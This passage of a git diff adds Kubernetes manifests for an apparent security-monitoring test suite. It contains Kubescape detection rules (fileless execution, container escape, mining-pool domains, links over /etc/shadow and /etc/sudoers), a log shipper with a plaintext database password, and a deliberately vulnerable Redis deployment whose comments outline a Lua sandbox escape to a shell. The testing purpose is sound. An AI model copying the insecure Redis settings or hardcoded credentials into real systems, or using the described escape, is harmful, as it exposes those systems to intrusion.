profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - exec + - mount + - applicationprofile + - name: Fileless execution detected + enabled: true + id: R1005 + description: Detecting Fileless Execution + expressions: + message: '''Fileless execution detected: exec call "'' + event.comm + ''" is + from a malicious source''' + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + ruleExpression: + - eventType: exec + expression: event.exepath.contains('memfd') || event.exepath.startsWith('/proc/self/fd') + || event.exepath.matches('/proc/[0-9]+/fd/[0-9]+') + profileDependency: 2 + severity: 8 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1055 + tags: + - fileless + - execution + - malicious + - name: Process tries to escape container + enabled: true + id: R1006 + description: Detecting Unshare System Call usage, which can be used to escape + container. + expressions: + message: '''Unshare system call (unshare) was called by process ('' + event.comm + + '')''' + uniqueId: event.comm + '_' + 'unshare' + ruleExpression: + - eventType: unshare + expression: event.pcomm != 'runc' && !ap.was_syscall_used(event.containerId, + 'unshare') + profileDependency: 2 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0004 + mitreTechnique: T1611 + tags: + - unshare + - escape + - unshare + - anomaly + - applicationprofile + - name: Crypto miner launched + enabled: true + id: R1007 + description: Detecting XMR Crypto Miners by randomx algorithm usage. + expressions: + message: '''XMR Crypto Miner process: ('' + event.exepath + '') executed''' + uniqueId: event.exepath + '_' + event.comm + ruleExpression: + - eventType: randomx + expression: 'true' + profileDependency: 2 + severity: 10 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0040 + mitreTechnique: T1496 + tags: + - crypto + - miners + - malicious + - name: Crypto Mining Domain Communication + enabled: true + id: R1008 + description: Detecting Crypto miners communication by domain + expressions: + message: '''Communication with a known crypto mining domain: '' + event.name' + uniqueId: event.name + '_' + event.comm + ruleExpression: + - eventType: dns + expression: event.name in ['2cryptocalc.com.', '2miners.com.', 'antpool.com.', + 'asia1.ethpool.org.', 'bohemianpool.com.', 'botbox.dev.', 'btm.antpool.com.', + 'c3pool.com.', 'c4pool.org.', 'ca.minexmr.com.', 'cn.stratum.slushpool.com.', + 'dash.antpool.com.', 'data.miningpoolstats.stream.', 'de.minexmr.com.', + 'eth-ar.dwarfpool.com.', 'eth-asia.dwarfpool.com.', 'eth-asia1.nanopool.org.', + 'eth-au.dwarfpool.com.', 'eth-au1.nanopool.org.', 'eth-br.dwarfpool.com.', + 'eth-cn.dwarfpool.com.', 'eth-cn2.dwarfpool.com.', 'eth-eu.dwarfpool.com.', + 'eth-eu1.nanopool.org.', 'eth-eu2.nanopool.org.', 'eth-hk.dwarfpool.com.', + 'eth-jp1.nanopool.org.', 'eth-ru.dwarfpool.com.', 'eth-ru2.dwarfpool.com.', + 'eth-sg.dwarfpool.com.', 'eth-us-east1.nanopool.org.', 'eth-us-west1.nanopool.org.', + 'eth-us.dwarfpool.com.', 'eth-us2.dwarfpool.com.', 'eth.antpool.com.', 'eu.stratum.slushpool.com.', + 'eu1.ethermine.org.', 'eu1.ethpool.org.', 'fastpool.xyz.', 'fr.minexmr.com.', + 'kriptokyng.com.', 'mine.moneropool.com.', 'mine.xmrpool.net.', 'miningmadness.com.', + 'monero.cedric-crispin.com.', 'monero.crypto-pool.fr.', 'monero.fairhash.org.', + 'monero.hashvault.pro.', 'monero.herominers.com.', 'monerod.org.', 'monerohash.com.', + 'moneroocean.stream.', 'monerop.com.', 'multi-pools.com.', 'p2pool.io.', + 'pool.kryptex.com.', 'pool.minexmr.com.', 'pool.monero.hashvault.pro.', + 'pool.rplant.xyz.', 'pool.supportxmr.com.', 'pool.xmr.pt.', 'prohashing.com.', + 'rx.unmineable.com.', 'sg.minexmr.com.', 'sg.stratum.slushpool.com.', 'skypool.org.', + 'solo-xmr.2miners.com.', 'ss.antpool.com.', 'stratum-btm.antpool.com.', + 'stratum-dash.antpool.com.', 'stratum-eth.antpool.com.', 'stratum-ltc.antpool.com.', + 'stratum-xmc.antpool.com.', 'stratum-zec.antpool.com.', 'stratum.antpool.com.', + 'supportxmr.com.', 'trustpool.cc.', 'us-east.stratum.slushpool.com.', 'us1.ethermine.org.', + 'us1.ethpool.org.', 'us2.ethermine.org.', 'us2.ethpool.org.', 'web.xmrpool.eu.', + 'www.domajorpool.com.', 'www.dxpool.com.', 'www.mining-dutch.nl.', 'xmc.antpool.com.', + 'xmr-asia1.nanopool.org.', 'xmr-au1.nanopool.org.', 'xmr-eu1.nanopool.org.', + 'xmr-eu2.nanopool.org.', 'xmr-jp1.nanopool.org.', 'xmr-us-east1.nanopool.org.', + 'xmr-us-west1.nanopool.org.', 'xmr.2miners.com.', 'xmr.crypto-pool.fr.', + 'xmr.gntl.uk.', 'xmr.nanopool.org.', 'xmr.pool-pay.com.', 'xmr.pool.minergate.com.', + 'xmr.solopool.org.', 'xmr.volt-mine.com.', 'xmr.zeropool.io.', 'zec.antpool.com.', + 'zergpool.com.', 'auto.c3pool.org.', 'us.monero.herominers.com.', 'xmr.kryptex.network.'] + profileDependency: 2 + severity: 10 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0011 + mitreTechnique: T1071.004 + tags: + - network + - crypto + - miners + - malicious + - dns + - name: Crypto Mining Related Port Communication + enabled: true + id: R1009 + description: Detecting Crypto Miners by suspicious port usage. + expressions: + message: '''Detected crypto mining related port communication on port '' + string(event.dstPort) + + '' to '' + event.dstAddr + '' with protocol '' + event.proto' + uniqueId: event.comm + '_' + string(event.dstPort) + ruleExpression: + - eventType: network + expression: event.proto == 'TCP' && event.pktType == 'OUTGOING' && event.dstPort + in [3333, 45700] && !nn.was_address_in_egress(event.containerId, event.dstAddr) + profileDependency: 1 + severity: 3 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0011 + mitreTechnique: T1071 + tags: + - network + - crypto + - miners + - malicious + - networkprofile + - name: Soft link created over sensitive file + enabled: true + id: R1010 + description: Detects symlink creation over sensitive files + expressions: + message: '''Symlink created over sensitive file: '' + event.oldPath + '' -> + '' + event.newPath' + uniqueId: event.comm + '_' + event.oldPath + ruleExpression: + - eventType: symlink + expression: (event.oldPath.startsWith('/etc/shadow') || event.oldPath.startsWith('/etc/sudoers')) + && !ap.was_path_opened(event.containerId, event.oldPath) + profileDependency: 1 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + tags: + - anomaly + - symlink + - applicationprofile + - name: ld_preload hooks technique detected + enabled: false + id: R1011 + description: Detecting ld_preload hook techniques. + expressions: + message: 'eventType == ''exec'' ? ''Process ('' + event.comm + '') is using + a dynamic linker hook: '' + process.get_ld_hook_var(event.pid) : ''The dynamic + linker configuration file ('' + event.path + '') was modified by process ('' + + event.comm + '')''' + uniqueId: 'eventType == ''exec'' ? ''exec_'' + event.comm : ''open_'' + event.path' + ruleExpression: + - eventType: exec + expression: event.comm != 'java' && event.containerName != 'matlab' && process.get_ld_hook_var(event.pid) + != '' + - eventType: open + expression: event.path == '/etc/ld.so.preload' && has(event.flagsRaw) && event.flagsRaw + != 0 + profileDependency: 1 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1574.006 + tags: + - exec + - malicious + - applicationprofile + - name: Hard link created over sensitive file + enabled: true + id: R1012 + description: Detecting hardlink creation over sensitive files. + expressions: + message: '''Hardlink created over sensitive file: '' + event.oldPath + '' - + '' + event.newPath' + uniqueId: event.comm + '_' + event.oldPath + ruleExpression: + - eventType: hardlink + expression: (event.oldPath.startsWith('/etc/shadow') || event.oldPath.startsWith('/etc/sudoers')) + && !ap.was_path_opened(event.containerId, event.oldPath) + profileDependency: 1 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + tags: + - files + - malicious + - applicationprofile + - name: Malicious Ptrace Usage + enabled: true + id: R1015 + description: Detecting potentially malicious ptrace usage. + expressions: + message: '''Malicious ptrace usage detected from: '' + event.comm' + uniqueId: event.exepath + '_' + event.comm + ruleExpression: + - eventType: ptrace + expression: 'true' + profileDependency: 2 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1622 + tags: + - process + - malicious + - name: Unexpected io_uring Operation Detected + enabled: true + id: R1030 + description: Detects io_uring operations that were not recorded during the initial + observation period, indicating potential unauthorized activity. + expressions: + message: '''Unexpected io_uring operation detected: (opcode='' + string(event.opcode) + + '') flags=0x'' + (has(event.flagsRaw) ? string(event.flagsRaw) : ''0'') + + '' in '' + event.comm + ''.''' + uniqueId: string(event.opcode) + '_' + event.comm + ruleExpression: + - eventType: iouring + expression: 'true' + profileDependency: 0 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1218 + tags: + - syscalls + - io_uring + - applicationprofile +--- +apiVersion: kubescape.io/v1 +kind: RuntimeRuleAlertBinding +metadata: + name: all-rules-all-pods + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + namespaceSelector: + matchExpressions: + - key: kubernetes.io/metadata.name + operator: NotIn + values: + - kubescape + - kube-system + - kube-flannel + - ingress-nginx + - olm + - px-operator + - honey + - pl + - clickhouse + - kube-public + - kube-node-lease + - local-path-storage + - gmp-system + - gmp-public + - storm + - lightening + - cert-manager + rules: + - ruleName: Unexpected process launched + - ruleName: Files Access Anomalies in container + - ruleName: Syscalls Anomalies in container + - ruleName: Linux Capabilities Anomalies in container + - ruleName: DNS Anomalies in container + - ruleName: Unexpected service account token access + - ruleName: Workload uses Kubernetes API unexpectedly + - ruleName: Process executed from malicious source + - ruleName: Process tries to load a kernel module + - ruleName: Drifted process executed + - ruleName: Disallowed ssh connection + - ruleName: Fileless execution detected + - ruleName: Crypto miner launched + - ruleName: Process executed from mount + - ruleName: Crypto Mining Related Port Communication + - ruleName: Crypto Mining Domain Communication + - ruleName: Read Environment Variables from procfs + - ruleName: eBPF Program Load + - ruleName: Soft link created over sensitive file + - ruleName: Unexpected Sensitive File Access + - ruleName: Hard link created over sensitive file + - ruleName: Exec to pod + - ruleName: Port forward + - ruleName: Unexpected Egress Network Traffic + - ruleName: Malicious Ptrace Usage + - ruleName: Unexpected io_uring Operation Detected +--- +apiVersion: admissionregistration.k8s.io/v1 +kind: ValidatingWebhookConfiguration +metadata: + name: validation + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +webhooks: +- name: validation.kubescape.admission + clientConfig: + service: + name: kubescape-admission-webhook + namespace: honey + path: /validate + port: 443 + caBundle: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURGekNDQWYrZ0F3SUJBZ0lRSWZrRGU0S0h2aFE1TlNGUWovWFk0ekFOQmdrcWhraUc5dzBCQVFzRkFEQVcKTVJRd0VnWURWUVFEREFzcUxtaHZibVY1TG5OMll6QWVGdzB5TmpBME1qVXdOak0xTVRoYUZ3MHlPVEF5TVRJdwpOak0xTVRoYU1CWXhGREFTQmdOVkJBTU1DeW91YUc5dVpYa3VjM1pqTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGCkFBT0NBUThBTUlJQkNnS0NBUUVBdzNWR1Nqc203dFNOeWwzdSsrY3FmdkplSmdRTDhwZG1qK0RBZWQya25oRE0KbVJWOHZtdXR1Unc2SE9rdlR4UmsyZnZUMWptRndHYWxMMVhqQ3M0SzZNQUJHS2VNTitpZUFIb0VXSXUzUENYYgpVdHc4SmVCNEZQWkpadEs5U0VLWElzVWVleTRBam5UNzFncmh0TkZkWFNoT2Y1a1AwaFlMR3V6MUFyaEUxR2pNCmlIaEJ4OWc1a1I1ZnpLcUphYVFZUk15ZnVlYmZVVUZjb2FyOG8xL1I2d1k0cE42KzdPYlE3UUhTSGM1bFN0SXoKWE50L0xjUjNIU0xVdVdEWkQ0UmN3dE1HSkEwRGdLcUExT1VrdzVSWW9DM3JVMHVlRG1rK2pzRVUrQUNDTEdqagpoYk9tcHJoSGs4bkkzcXRNYmM2bFVRRmlCdkRkSzFpdVd0Y3ZoOXNmbndJREFRQUJvMkV3WHpBT0JnTlZIUThCCkFmOEVCQU1DQXFRd0hRWURWUjBsQkJZd0ZBWUlLd1lCQlFVSEF3RUdDQ3NHQVFVRkJ3TUNNQThHQTFVZEV3RUIKL3dRRk1BTUJBZjh3SFFZRFZSME9CQllFRk54aGhTcjRmaFJydVJwWlpueVJZSlFqcDVaOE1BMEdDU3FHU0liMwpEUUVCQ3dVQUE0SUJBUUJLT0hDaGNoTHQwcS9DaGhJdUtSZ1Q4VUY4OXpWY2hPZzI2Q0J4cWFOQk1vRnhwZE43CmxzZ1VjSGpXY0FaalFRZlI3UlhORDkxL25pL0l6QjBGb2JqKzZPY2tncXNydlZQZzlJc29kTjhJTi9tZkJ1cG4KdkFpY0JyNFd5RHI0dFA3Yk1Ma1RKU2p6UVpOT2E1NVMvTTNRU0xOOW5IVWM0MW5nVUFyeUtXUDdCancySlRZNQprR1lDNWdXZjJXR0F6aG1tMjJmbmZrMXNPK0N1TnErSlBqWmNrR210ZUhCbkNnYUNsblRaNkFkeFUySWd6UlFZCndNUHpJajJBVUkzMXlNZlZLMkZmOU5NV0M0YVAwUk4va3cwaXNOaVpVR1NaZTAzQk05L3hhSy93VkJ1d3BFdlAKVjhYcGwrREtXWFkwcVZaMWwzTk5SNUJFSG5qZldKYisraUROCi0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K + admissionReviewVersions: + - v1 + sideEffects: None + rules: + - operations: + - CREATE + - UPDATE + - DELETE + - CONNECT + apiGroups: + - '*' + apiVersions: + - v1 + resources: + - pods + - pods/exec + - pods/portforward + - pods/attach + - clusterrolebindings + - rolebindings + scope: '*' + failurePolicy: Ignore diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml new file mode 100644 index 00000000000..051fb34d176 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml @@ -0,0 +1,87 @@ +# Vector Helm values for iximiuz lab — kubescape node-agent → ClickHouse +# Deploy: helm install vector vector/vector -n honey -f values.yaml + +role: "Agent" + +image: + repository: timberio/vector + pullPolicy: IfNotPresent + +resources: + requests: + cpu: 50m + memory: 64Mi + limits: + cpu: 200m + memory: 128Mi + +tolerations: + - operator: Exists + +env: + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + +customConfig: + data_dir: /vector-data-dir + api: + enabled: true + address: 127.0.0.1:8686 + playground: false + + sources: + kubescape_nodeagent_logs: + type: kubernetes_logs + extra_label_selector: "app=node-agent" + + transforms: + kubescape_parse: + type: remap + inputs: + - kubescape_nodeagent_logs + source: | + . = parse_json!(.message) + + kubescape_filter: + type: filter + inputs: + - kubescape_parse + condition: '.BaseRuntimeMetadata != null' + + kubescape_enrich: + type: remap + inputs: + - kubescape_filter + source: | + .CloudMetadata = "empty" + .hostname = get_env_var!("NODE_NAME") + .event_time = to_unix_timestamp(now()) + del(.time) + + sinks: + kubescape_debug: + type: file + inputs: + - kubescape_enrich + encoding: + codec: json + path: "/tmp/kubescape.json" + + kubescape_clickhouse: + type: clickhouse + inputs: + - kubescape_enrich + database: forensic_db + table: kubescape_logs + endpoint: "http://clickhouse.forensic.austrianopencloudcommunity.org:8123" + skip_unknown_fields: true + date_time_best_effort: true + auth: + strategy: "basic" + user: pixie + password: pixie_password + batch: + max_bytes: 5000000 + timeout_secs: 2 diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml new file mode 100644 index 00000000000..ed14ac92b4e --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml @@ -0,0 +1,307 @@ +--- +# Source: vector/templates/serviceaccount.yaml +apiVersion: v1 +kind: ServiceAccount +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +automountServiceAccountToken: true +--- +# Source: vector/templates/configmap.yaml +apiVersion: v1 +kind: ConfigMap +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +data: + vector.yaml: | + api: + address: 127.0.0.1:8686 + enabled: true + playground: false + data_dir: /vector-data-dir + sinks: + kubescape_clickhouse: + auth: + password: pixie_password + strategy: basic + user: pixie + batch: + max_bytes: 5000000 + timeout_secs: 2 + database: forensic_db + date_time_best_effort: true + endpoint: http://clickhouse.forensic.austrianopencloudcommunity.org:8123 + inputs: + - kubescape_enrich + skip_unknown_fields: true + table: kubescape_logs + type: clickhouse + kubescape_debug: + encoding: + codec: json + inputs: + - kubescape_enrich + path: /tmp/kubescape.json + type: file + sources: + kubescape_nodeagent_logs: + extra_label_selector: app=node-agent + type: kubernetes_logs + transforms: + kubescape_enrich: + inputs: + - kubescape_filter + source: | + .CloudMetadata = "empty" + .hostname = get_env_var!("NODE_NAME") + .event_time = to_unix_timestamp(now()) + del(.time) + type: remap + kubescape_filter: + condition: .BaseRuntimeMetadata != null + inputs: + - kubescape_parse + type: filter + kubescape_parse: + inputs: + - kubescape_nodeagent_logs + source: | + . = parse_json!(.message) + type: remap +--- +# Source: vector/templates/rbac.yaml +# Permissions to use Kubernetes API. +# Requires that RBAC authorization is enabled. +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: vector + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +rules: + - apiGroups: + - "" + resources: + - namespaces + - nodes + - pods + verbs: + - list + - watch +--- +# Source: vector/templates/rbac.yaml +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: vector + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: vector +subjects: + - kind: ServiceAccount + name: vector + namespace: "honey" +--- +# Source: vector/templates/service-headless.yaml +apiVersion: v1 +kind: Service +metadata: + name: vector-headless + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + + annotations: +spec: + clusterIP: None + ports: + - name: api + port: 8686 + protocol: TCP + targetPort: 8686 + selector: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + type: ClusterIP +--- +# Source: vector/templates/service.yaml +apiVersion: v1 +kind: Service +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + + annotations: +spec: + ports: + - name: api + port: 8686 + protocol: TCP + targetPort: 8686 + selector: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + type: ClusterIP +--- +# Source: vector/templates/daemonset.yaml +apiVersion: apps/v1 +kind: DaemonSet +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +spec: + selector: + matchLabels: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + minReadySeconds: 0 + template: + metadata: + annotations: + checksum/config: 6840eb68ad4549d7f15ba76da2b37fd179c92f96d58d1ae0f60ff90a4b9e5554 + labels: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + vector.dev/exclude: "true" + spec: + serviceAccountName: vector + dnsPolicy: ClusterFirst + containers: + - name: vector + image: "timberio/vector:0.54.0-distroless-libc" + imagePullPolicy: IfNotPresent + args: + - --config-dir + - /etc/vector/ + env: + - name: VECTOR_LOG + value: "info" + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: VECTOR_SELF_NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: VECTOR_SELF_POD_NAME + valueFrom: + fieldRef: + fieldPath: metadata.name + - name: VECTOR_SELF_POD_NAMESPACE + valueFrom: + fieldRef: + fieldPath: metadata.namespace + - name: PROCFS_ROOT + value: "/host/proc" + - name: SYSFS_ROOT + value: "/host/sys" + ports: + - name: api + containerPort: 8686 + protocol: TCP + resources: + limits: + cpu: 200m + memory: 128Mi + requests: + cpu: 50m + memory: 64Mi + volumeMounts: + - name: data + mountPath: "/vector-data-dir" + - name: config + mountPath: "/etc/vector/" + readOnly: true + - mountPath: /var/log/ + name: var-log + readOnly: true + - mountPath: /var/lib + name: var-lib + readOnly: true + - mountPath: /host/proc + name: procfs + readOnly: true + - mountPath: /host/sys + name: sysfs + readOnly: true + terminationGracePeriodSeconds: 60 + tolerations: + - operator: Exists + volumes: + - name: config + projected: + sources: + - configMap: + name: vector + - name: data + hostPath: + path: "/var/lib/vector" + - hostPath: + path: /var/log/ + name: var-log + - hostPath: + path: /var/lib/ + name: var-lib + - hostPath: + path: /proc + name: procfs + - hostPath: + path: /sys + name: sysfs diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-sbob.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-sbob.yaml new file mode 100644 index 00000000000..433d5a1fd35 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-sbob.yaml @@ -0,0 +1,145 @@ +# Kubescape ApplicationProfile for the vulnerable redis deployment used by the +# sovereign-soc perf_tool suite. This profile is pre-populated (no learning +# phase needed) so that attacks fired against redis trigger anomaly alerts +# immediately. The profile shape is taken verbatim from the sovereignsocdemo +# playground startup file: +# https://github.com/k8sstormcenter/sovereignsocdemo/blob/main/index.md +# (section "playground.startupFiles[/home/laborant/redis-sbob.yaml]") +# +# Apache-2.0 licensed alongside the upstream demo. +apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1 +kind: ApplicationProfile +metadata: + name: redis + namespace: redis +spec: + architectures: + - amd64 + containers: + - capabilities: + - CAP_CHOWN + - CAP_DAC_OVERRIDE + - CAP_DAC_READ_SEARCH + - CAP_SETGID + - CAP_SETPCAP + - CAP_SETUID + - CAP_SYS_ADMIN + endpoints: null + execs: + - args: + - /usr/local/bin/redis-cli + - ping + path: /usr/local/bin/redis-cli + identifiedCallStacks: null + imageID: ghcr.io/k8sstormcenter/redis-vulnerable@sha256:aec7a0c5713a190ed4e02b30a9f066cb1d7137531d8c3bca21c2781ca8a7d945 + imageTag: ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10 + name: redis + opens: + - flags: + - O_CLOEXEC + - O_RDONLY + path: /etc/group + - flags: + - O_CLOEXEC + - O_RDONLY + path: /etc/ld.so.cache + - flags: + - O_CLOEXEC + - O_RDONLY + path: /etc/passwd + - flags: + - O_CLOEXEC + - O_RDONLY + path: /proc/⋯ + - flags: + - O_CLOEXEC + - O_RDONLY + path: /proc/⋯/kernel/* + - flags: + - O_CLOEXEC + - O_RDONLY + path: /proc/⋯/setgroups + - flags: + - O_RDONLY + path: /proc/⋯/stat + - flags: + - O_CLOEXEC + - O_RDONLY + - O_WRONLY + path: /proc/⋯/task/* + - flags: + - O_CLOEXEC + - O_RDONLY + path: /⋯/kernel/* + - flags: + - O_CLOEXEC + - O_RDONLY + path: /⋯/setgroups + - flags: + - O_CLOEXEC + - O_RDONLY + path: /runc + - flags: + - O_RDONLY + path: /⋯/stat + - flags: + - O_CLOEXEC + - O_RDONLY + - O_WRONLY + path: /⋯/task/* + - flags: + - O_RDONLY + path: /sys/kernel/mm/transparent_hugepage/hpage_pmd_size + - flags: + - O_CLOEXEC + - O_RDONLY + path: /sys/fs/cgroup/* + - flags: + - O_CLOEXEC + - O_RDONLY + path: /usr/lib/x86_64-linux-gnu/libc.so.6 + - flags: + - O_CLOEXEC + - O_RDONLY + path: /usr/lib/x86_64-linux-gnu/libm.so.6 + rulePolicies: + R0002: + processAllowed: + - runc + - "runc:[2:INIT]" + seccompProfile: + spec: + defaultAction: "" + syscalls: + - accept4 + - access + - arch_prctl + - brk + - close + - connect + - epoll_ctl + - epoll_wait + - exit_group + - fcntl + - getpid + - getrandom + - ioctl + - mmap + - mprotect + - munmap + - newfstatat + - openat + - poll + - pread64 + - prlimit64 + - read + - recvfrom + - rseq + - sendto + - set_robust_list + - set_tid_address + - setsockopt + - socket + - uname + - write + - writev diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-vulnerable.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-vulnerable.yaml new file mode 100644 index 00000000000..71350566d9c --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-vulnerable.yaml @@ -0,0 +1,206 @@ +# Pinned copy of upstream k8sstormcenter/bob@68fbfb83dc63f4e0184ecbf66d9c5f251a74b0b7 +# example/redis-vulnerable.yaml (Apache-2.0 licensed). +# +# Redis 7.2.10 — vulnerable to CVE-2025-49844 + CVE-2022-0543 +# +# CVE-2025-49844: Use-After-Free in Lua parser lparser.c (all Redis < 7.2.11) +# CVE-2022-0543: Lua sandbox escape via package.loadlib (Debian packaging issue) +# +# This uses a custom image built from Dockerfile.redis-vulnerable that patches +# the Lua sandbox to reproduce the CVE-2022-0543 condition, enabling full +# sandbox escape via EVAL → package.loadlib → io.popen → shell. +# +# Deploys into its own "redis" namespace with: +# Namespace, ServiceAccount, Role, RoleBinding, Deployment, Service +--- +apiVersion: v1 +kind: Namespace +metadata: + name: redis + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/part-of: bob-cve-2025-49844 +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: redis + namespace: redis + labels: + app.kubernetes.io/name: redis +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: redis + namespace: redis +rules: + - apiGroups: [""] + resources: ["pods"] + verbs: ["get", "list"] +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: redis + namespace: redis +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: redis +subjects: + - kind: ServiceAccount + name: redis + namespace: redis +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: redis-config + namespace: redis +data: + redis.conf: | + # Disable protected mode (no auth, no bind restriction) + protected-mode no + bind 0.0.0.0 + port 6379 + + # Persistence off — ephemeral for testing + save "" + appendonly no + + # Memory limit + maxmemory 256mb + maxmemory-policy allkeys-lru + + # Logging + loglevel notice +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: redis + namespace: redis + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/version: "7.2.10" + cve: CVE-2025-49844 +spec: + replicas: 1 + selector: + matchLabels: + app.kubernetes.io/name: redis + template: + metadata: + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/version: "7.2.10" + spec: + serviceAccountName: redis + containers: + - name: redis + image: ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10 + command: ["redis-server", "/etc/redis/redis.conf"] + ports: + - containerPort: 6379 + name: redis + protocol: TCP + volumeMounts: + - name: config + mountPath: /etc/redis + readOnly: true + resources: + requests: + cpu: 250m + memory: 256Mi + limits: + cpu: "1" + memory: 512Mi + livenessProbe: + exec: + command: ["redis-cli", "ping"] + initialDelaySeconds: 5 + periodSeconds: 10 + readinessProbe: + exec: + command: ["redis-cli", "ping"] + initialDelaySeconds: 3 + periodSeconds: 5 + volumes: + - name: config + configMap: + name: redis-config +--- +apiVersion: v1 +kind: Service +metadata: + name: redis + namespace: redis + labels: + app.kubernetes.io/name: redis +spec: + type: ClusterIP + selector: + app.kubernetes.io/name: redis + ports: + - port: 6379 + targetPort: 6379 + protocol: TCP + name: redis +--- +# A second Service exposing Redis on a non-standard port (16379 → 6379). +# Used by the endpoint test: if the ApplicationProfile records port=0 (wildcard), +# connections on ANY port are considered "normal" — including this one. +# If the profile records only :6379, connections via :16379 should be anomalous. +apiVersion: v1 +kind: Service +metadata: + name: 